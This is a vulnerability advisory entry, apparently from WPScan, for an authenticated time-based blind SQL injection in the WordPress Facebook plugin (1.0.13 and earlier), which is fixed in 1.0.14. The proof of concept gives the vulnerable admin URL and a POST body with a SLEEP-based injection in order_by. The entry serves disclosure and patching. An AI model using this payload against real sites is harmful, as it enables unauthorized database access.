WordPress Facebook <= 1.0.13 - Authenticated SQL Injection


Description
Time-based blind SQL injection in the order_by parameter of the plugin's Spider_Facebook_manage admin page (wp-admin/admin.php?page=Spider_Facebook_manage), reachable by an authenticated user who can access that page. Full advisory:
http://www.defensecode.com/advisories/DC-2017-04-011_WordPress_Facebook_Plugin_Advisory.pdf
Proof of Concept
Vulnerable POST URL:
http://vulnerablesite.com/wp-admin/admin.php?page=Spider_Facebook_manage

Vulnerable POST Body:
search_events_by_title=&page_number=1&serch_or_not=&asc_or_desc=1&order_by=type AND (SELECT * FROM (SELECT(SLEEP(5)))DefenseCode)

Affects Plugin

Facebook (spider-facebook), fixed in version 1.0.14

References

URL http://www.defensecode.com/advisories/DC-2017-04-011_WordPress_Facebook_Plugin_Advisory.pdf
URL https://plugins.trac.wordpress.org/changeset/1631122/spider-facebook

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter https://twitter.com/DefenseCode/
Verified No
WPVDB ID 8806

Timeline

Publicly Published 2017-05-02
Added 2017-05-05
Last Updated 2017-05-05

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.